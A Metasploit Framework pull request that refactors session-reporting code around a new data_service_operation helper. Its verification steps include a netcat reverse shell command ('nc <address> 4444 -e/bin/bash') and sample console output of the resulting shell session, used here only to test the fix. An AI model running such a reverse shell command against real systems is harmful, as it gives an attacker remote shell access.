### PR TITLE
Enhance session report fix

### DIFF
--- a/lib/metasploit/framework/data_service/proxy/core.rb
+++ b/lib/metasploit/framework/data_service/proxy/core.rb
@@ -150,6 +150,25 @@ class DataProxy
     return @current_data_service
   end
 
+  # Performs a set of data service operations declared within the block.
+  # This passes the @current_data_service as a parameter to the block.
+  # If there is no current data service registered, the block is not
+  # executed and the method simply returns.
+  def data_service_operation(&block)
+    $stderr.puts("data_service_operation(): #{block_given?}")
+    return unless block_given?
+
+    begin
+      data_service = self.get_data_service
+    rescue
+      $stderr.puts("data_service_operation(): in rescue, returning...")
+      return
+    end
+
+    $stderr.puts("data_service_operation(): calling block...")
+    block.call(data_service) unless data_service.nil?
+  end
+
   def log_error(exception, ui_message)
     elog "#{ui_message}: #{exception.message}"
     exception.backtrace.each { |line| elog "#{line}" }

--- a/lib/metasploit/framework/data_service/proxy/core.rb
+++ b/lib/metasploit/framework/data_service/proxy/core.rb
@@ -174,7 +174,7 @@ class DataProxy
     exception.backtrace.each { |line| elog "#{line}" }
     # TODO: We should try to surface the original exception, instead of just a generic one.
     # This should not display the full backtrace, only the message.
-    raise Exception, "#{ui_message}: #{exception.message}. See log for more details."
+    raise "#{ui_message}: #{exception.message}. See log for more details."
   end
 
   # Adds a valid workspace value to the opts hash before sending on to the data layer.

--- a/lib/metasploit/framework/data_service/proxy/core.rb
+++ b/lib/metasploit/framework/data_service/proxy/core.rb
@@ -155,17 +155,14 @@ class DataProxy
   # If there is no current data service registered, the block is not
   # executed and the method simply returns.
   def data_service_operation(&block)
-    $stderr.puts("data_service_operation(): #{block_given?}")
     return unless block_given?
 
     begin
       data_service = self.get_data_service
     rescue
-      $stderr.puts("data_service_operation(): in rescue, returning...")
       return
     end
 
-    $stderr.puts("data_service_operation(): calling block...")
     block.call(data_service) unless data_service.nil?
   end
 

--- a/lib/metasploit/framework/data_service/proxy/session_data_proxy.rb
+++ b/lib/metasploit/framework/data_service/proxy/session_data_proxy.rb
@@ -1,21 +1,21 @@
 module SessionDataProxy
   def sessions(opts={})
     begin
-      data_service = self.get_data_service
-      add_opts_workspace(opts)
-      data_service.sessions(opts)
+      self.data_service_operation do |data_service|
+        add_opts_workspace(opts)
+        data_service.sessions(opts)
+      end
     rescue => e
       self.log_error(e, "Problem retrieving sessions")
     end
   end
 
   def report_session(opts)
-    return unless self.active
-
     begin
-      data_service = self.get_data_service
-      add_opts_workspace(opts)
-      data_service.report_session(opts)
+      self.data_service_operation do |data_service|
+        add_opts_workspace(opts)
+        data_service.report_session(opts)
+      end
     rescue => e
       self.log_error(e, "Problem reporting session")
     end

--- a/lib/metasploit/framework/data_service/proxy/session_event_data_proxy.rb
+++ b/lib/metasploit/framework/data_service/proxy/session_event_data_proxy.rb
@@ -1,11 +1,10 @@
 module SessionEventDataProxy
 
   def report_session_event(opts)
-    return unless self.active
-
     begin
-      data_service = self.get_data_service()
-      data_service.report_session_event(opts)
+      self.data_service_operation do |data_service|
+        data_service.report_session_event(opts)
+      end
     rescue => e
       self.log_error(e, "Problem reporting session event")
     end


### PR DESCRIPTION
This enhances @Green-m's session report fix in a manner that provides flexibility for the future in handling data service operations. All of the `DataProxy` modules should be updated to use this pattern.

## Verification

Follow the same verification steps detailed in rapid7/metasploit-framework#10862
- [ ] Start `msfconsole` without a database: `msfconsole -n`
- [ ] `use exploit/multi/handler`
- [ ] `set payload cmd/unix/reverse_netcat`
- [ ] `set lhost <address>`
- [ ] `set lport 4444`
- [ ] `run`
- [ ] On another system run `nc <address> 4444 -e/bin/bash`
- [ ] **Verify** a session opened message is displayed

### Example Output
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat                                                      
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 172.28.128.1
lhost => 172.28.128.1
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54136) at 2018-10-25 15:00:53 -0400              

^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               172.28.128.1:4444 -> 172.28.128.3:54136 (172.28.128.3) 
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > db_status 
[-] No database driver installed.
```